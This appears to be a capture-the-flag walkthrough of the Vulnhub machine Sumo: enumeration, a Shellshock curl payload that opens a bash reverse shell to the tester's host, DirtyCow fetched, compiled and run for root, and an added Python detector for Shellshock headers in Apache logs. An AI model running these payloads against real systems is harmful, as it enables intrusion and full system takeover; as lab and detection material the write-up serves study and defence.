__    _____        _____     _____ _ _____
        |  |  |  _  |   ___|  _  |___|  |  |_|_   _|___
        |  |__|     |  |  _|     |_ -|     | | | | | .'| 
        |_____|__|__|  |___|__|__|___|__|__|_| |_| |__,|
			hola@lacashita.com


[VLN] Sumo

Today we are going to hack the Vulnhub machine called Sumo. You can download it from the following link: https://www.vulnhub.com/entry/sumo-1,480/
  • Enumeration
    We start with an nmap scan to see which ports are open.

        sml@Cassandra:~$ nmap -A -p- 192.168.1.104
        Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-16 12:18 CEST
        Nmap scan report for ubuntu.home (192.168.1.104)
        Host is up (0.00026s latency).
        Not shown: 65533 closed ports
        PORT   STATE SERVICE VERSION
        22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
        | ssh-hostkey:
        |   1024 06:cb:9e:a3:af:f0:10:48:c4:17:93:4a:2c:45:d9:48 (DSA)
        |   2048 b7:c5:42:7b:ba:ae:9b:9b:71:90:e7:47:b4:a4:de:5a (RSA)
        |_  256 fa:81:cd:00:2d:52:66:0b:70:fc:b8:40:fa:db:18:30 (ECDSA)
        80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
        |_http-server-header: Apache/2.2.22 (Ubuntu)
        |_http-title: Site doesn't have a title (text/html).
        Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

        Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
        Nmap done: 1 IP address (1 host up) scanned in 9.88 seconds

    Let's see if we can find anything on port 80. In the first scan, using the following command:

        dirb http://192.168.1.104/cgi-bin /usr/share/wordlists/dirb/big.txt

    the /cgi-bin directory showed up, so let's see if there is anything else inside it.

        sml@Cassandra:~$ dirb http://192.168.1.104/cgi-bin /usr/share/wordlists/dirb/big.txt

        -----------------
        DIRB v2.22
        By The Dark Raver
        -----------------

        START_TIME: Sat May 16 12:44:01 2020
        URL_BASE: http://192.168.1.104/cgi-bin/
        WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt

        -----------------

        GENERATED WORDS: 20458

        ---- Scanning URL: http://192.168.1.104/cgi-bin/ ----
        + http://192.168.1.104/cgi-bin/test (CODE:200|SIZE:14)

        -----------------
        END_TIME: Sat May 16 12:44:14 2020
        DOWNLOADED: 20458 - FOUND: 1

    We find /cgi-bin/test. The VM looks very outdated, so let's try Shellshock.
  • Exploitation
    We set our nc listener up:

        sml@Cassandra:~$ nc -nlvp 5555

    And from another terminal we send the following:

        sml@Cassandra:~$ curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'bash -i >& /dev/tcp/192.168.1.148/5555 0>&1'" http://192.168.1.104/cgi-bin/test

    And we get the shell :)

        sml@Cassandra:~$ nc -nlvp 5555
        listening on [any] 5555 ...
        connect to [192.168.1.148] from (UNKNOWN) [192.168.1.104] 40918
        bash: no job control in this shell
        www-data@ubuntu:/usr/lib/cgi-bin$
        www-data@ubuntu:/usr/lib/cgi-bin$ python -c 'import pty; pty.spawn("/bin/sh")'
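    From the defender's side, the request above leaves a very recognisable trace in the web server log. The following is an added example, not part of the original walkthrough: a small Python detector that flags Shellshock-style header values in Apache combined-format access log lines. The log lines are constructed for the example; it assumes the CGI requests are logged in combined format and that User-Agent and Referer are the headers mod_cgi copies into the script's environment.

```python
import re
from typing import Dict, List

# Constructed sample access log lines in Apache "combined" format (not from the original post).
# Line 2 carries the User-Agent value used in the walkthrough; line 3 carries the classic
# harmless test string in the Referer header; lines 1 and 4 are ordinary traffic.
SAMPLE_LOG = """\
192.168.1.148 - - [16/May/2020:12:44:01 +0200] "GET /cgi-bin/test HTTP/1.1" 200 14 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.168.1.148 - - [16/May/2020:12:50:12 +0200] "GET /cgi-bin/test HTTP/1.1" 200 14 "-" "() { :; }; echo; echo; /bin/bash -c 'bash -i >& /dev/tcp/192.168.1.148/5555 0>&1'"
192.168.1.148 - - [16/May/2020:12:51:03 +0200] "GET /cgi-bin/test HTTP/1.1" 200 14 "() { :;}; echo vulnerable" "curl/7.68.0"
10.0.0.5 - - [16/May/2020:12:52:44 +0200] "GET /index.html HTTP/1.1" 200 177 "-" "curl/7.68.0"
"""

COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# The Shellshock trigger is a bash function definition, "() {", at the very start of an
# environment variable's value. mod_cgi copies User-Agent and Referer verbatim into
# HTTP_USER_AGENT and HTTP_REFERER, so those two header fields are the ones to inspect.
SHELLSHOCK_RE = re.compile(r'^\s*\(\s*\)\s*\{')


def detect_shellshock(log_text: str) -> List[Dict[str, str]]:
    """Return one finding per log line whose User-Agent or Referer starts with '() {'."""
    findings = []
    for line in log_text.splitlines():
        m = COMBINED_RE.match(line)
        if not m:
            continue  # not combined format; skip rather than guess
        for field in ("ua", "referer"):
            if SHELLSHOCK_RE.search(m.group(field)):
                # A 200 on a /cgi-bin/ path means a CGI script actually ran with the
                # hostile environment, so treat that as the high-severity case.
                cgi_hit = m.group("path").startswith("/cgi-bin/") and m.group("status") == "200"
                findings.append({
                    "ip": m.group("ip"),
                    "time": m.group("ts"),
                    "path": m.group("path"),
                    "header": "User-Agent" if field == "ua" else "Referer",
                    "severity": "high" if cgi_hit else "medium",
                })
                break
    return findings


if __name__ == "__main__":
    for finding in detect_shellshock(SAMPLE_LOG):
        print(finding)
```

    The real fix is a patched bash; the log check only tells you whether someone has already tried.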
  • Privilege Escalation
    Once inside, we see that the system has a fairly old kernel, so we try the DirtyCow exploit: https://gist.githubusercontent.com/KrE80r/42f8629577db95782d5e4f609f437a54/raw/71c902f55c09aa8ced351690e1e627363c231b45/c0w.c
    We download and compile it on our own machine!

        sml@Cassandra:~$ wget https://gist.githubusercontent.com/KrE80r/42f8629577db95782d5e4f609f437a54/raw/71c902f55c09aa8ced351690e1e627363c231b45/c0w.c
        --2020-05-17 15:48:15--  https://gist.githubusercontent.com/KrE80r/42f8629577db95782d5e4f609f437a54/raw/71c902f55c09aa8ced351690e1e627363c231b45/c0w.c
        Resolviendo gist.githubusercontent.com (gist.githubusercontent.com)... 151.101.132.133
        Conectando con gist.githubusercontent.com (gist.githubusercontent.com)[151.101.132.133]:443... conectado.
        Petición HTTP enviada, esperando respuesta... 200 OK
        Longitud: 4368 (4,3K) [text/plain]
        Grabando a: “c0w.c”

        c0w.c               100%[======================>]   4,27K  --.-KB/s    en 0s

        2020-05-17 15:48:16 (25,2 MB/s) - “c0w.c” guardado [4368/4368]

        sml@Cassandra:~$ gcc -pthread c0w.c -o c0w
        c0w.c: In function ‘main’:
        c0w.c:103:3: warning: implicit declaration of function ‘asprintf’; did you mean ‘vsprintf’? [-Wimplicit-function-declaration]
          103 |   asprintf(&backup, "cp %s /tmp/bak", suid_binary);
              |   ^~~~~~~~
              |   vsprintf
        c0w.c:104:3: warning: implicit declaration of function ‘system’ [-Wimplicit-function-declaration]
          104 |   system(backup);
              |   ^~~~~~
        sml@Cassandra:~$ cp c0w /var/www/html

    Once compiled, we put the binary on our web server so we can download it from the "victim" machine.

        www-data@ubuntu:/tmp$ wget http://192.168.1.148/c0w
        wget http://192.168.1.148/c0w
        --2020-05-17 06:48:48--  http://192.168.1.148/c0w
        Connecting to 192.168.1.148:80... connected.
        HTTP request sent, awaiting response... 200 OK
        Length: 17904 (17K) [application/octet-stream]
        Saving to: `c0w'

             0K .......... .......                                    100%  424M=0s

        2020-05-17 06:48:48 (424 MB/s) - `c0w' saved [17904/17904]

    We give it execute permission and run it.

        www-data@ubuntu:/tmp$ chmod +x c0w
        $ ./c0w
           (___)
           (o o)_____/
            @@ `     \
             \ ____, //usr/bin/passwd
             //    //
            ^^    ^^
        DirtyCow root privilege escalation
        Backing up /usr/bin/passwd to /tmp/bak
        mmap 35d2c000
        madvise 0
        ptrace 0
        $

    Now all that is left is to run "passwd"...

        $ /usr/bin/passwd
        /usr/bin/passwd
        root@ubuntu:/tmp# id
        id
        uid=0(root) gid=33(www-data) groups=0(root),33(www-data)
  • root.txt

        root@ubuntu:/tmp# cd /root
        root@ubuntu:/root# ls
        root.txt
        root@ubuntu:/root# cat root.txt
        {Sum0-SunCSR-2020_r001}

  • End
    And with that we are root on the machine :)